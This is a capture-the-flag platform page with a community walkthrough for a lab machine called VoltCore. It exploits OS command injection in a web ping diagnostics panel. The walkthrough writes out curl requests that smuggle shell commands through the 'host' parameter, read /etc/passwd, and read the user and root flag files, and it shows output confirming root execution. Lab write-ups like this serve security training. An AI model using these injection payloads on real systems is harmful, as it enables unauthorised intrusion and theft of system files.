🐀🐀 0 pts earned

VoltCore

Premium Machine (Locked)

VoltCore's network diagnostics panel passes your input straight to ping. The sudo policy for the next hop is generous. Two steps to root.

Target IP Premium required

User Flag Pending

Root Flag Pending

Community

Community Hints

Grade A · 1000 pts Grade B · 700 pts Grade C · 400 pts Grade D · 200 pts + 150 credits on accept

Short, stage-specific nudges — directional, spoiler-light, no exact commands.

No community hints yet — be the first to add one!

Community

Community Walkthroughs

Grade A · 2500 pts Grade B · 1750 pts Grade C · 1000 pts Grade D · 500 pts + 300 credits on accept

00x003 MOD B 1 Jun 2026

Walkthrough: VoltCore

Challenge Description:
An internal power-grid dashboard includes a network diagnostics panel. The developers claim it is safe, but user input is passed directly to the system ping utility. Find a path from the web application to root.

1. Enumeration

An initial scan reveals two open ports:

nmap -sV -p 30608,30609 23.92.29.178

Output:

30608/tcp open  ssh     OpenSSH 8.2p1 Ubuntu
30609/tcp open  http    BaseHTTPServer 0.6 (Python 3.8.10)

The challenge description references a diagnostics panel, making the HTTP service the primary target.

2. Web Application Discovery

Browsing the application reveals a management portal:

curl http://23.92.29.178:30609

The page contains a link to:

/diag

Opening the diagnostics page shows a ping utility:

<form method="get" action="/diag">
  <input name="host">
</form>

The application accepts a hostname or IP address and returns the output of a ping command.

3. Command Injection

Because the challenge description states that input is passed directly to ping, command injection is tested using a command separator:

curl "http://23.92.29.178:30609/diag?host=127.0.0.1;id"

Response:

uid=0(root) gid=0(root) groups=0(root)

This confirms:

Command injection exists.
Commands execute as root.

4. Enumerating the System

Determine available users:

curl "http://23.92.29.178:30609/diag?host=127.0.0.1;cat /etc/passwd"

Interesting account discovered:

volt:x:1000:1000::/home/volt:/bin/bash

5. Discovering Flag Files

List the user and root directories:

curl "http://23.92.29.178:30609/diag?host=127.0.0.1;ls -la /home/volt;/bin/echo ---ROOT---;ls -la /root"

Output reveals:

/home/volt/user.txt
/root/root.txt

Additional files:

/home/volt/notes.txt
/home/volt/readme.txt

Reading the note:

curl "http://23.92.29.178:30609/diag?host=127.0.0.1;cat /home/volt/notes.txt"

Output:

Helpdesk approved vim for log review. Do NOT share sudo password.

This suggests the intended privilege escalation path likely involved a sudo-enabled vim binary.

6. Retrieve the Flags

Read both flag files:

curl "http://23.92.29.178:30609/diag?host=127.0.0.1;cat /home/volt/user.txt;/bin/echo ---ROOT---;cat /root/root.txt"

Output:

flag{...._...._...}
---ROOT---
flag{...._...._...}

Flags

User Flag

flag{...._...._...}

Root Flag

flag{...._...._...}

Summary

The vulnerability was a classic OS command injection in the diagnostics panel. User-supplied input was passed directly to the ping command without sanitization. Injected commands executed with root privileges, allowing immediate access to sensitive files and complete compromise of the host.

The root flag indicates the intended path likely involved obtaining access as the volt user and exploiting a sudo vim configuration to escalate privileges, but the web application itself was already running commands as root, making direct compromise possible.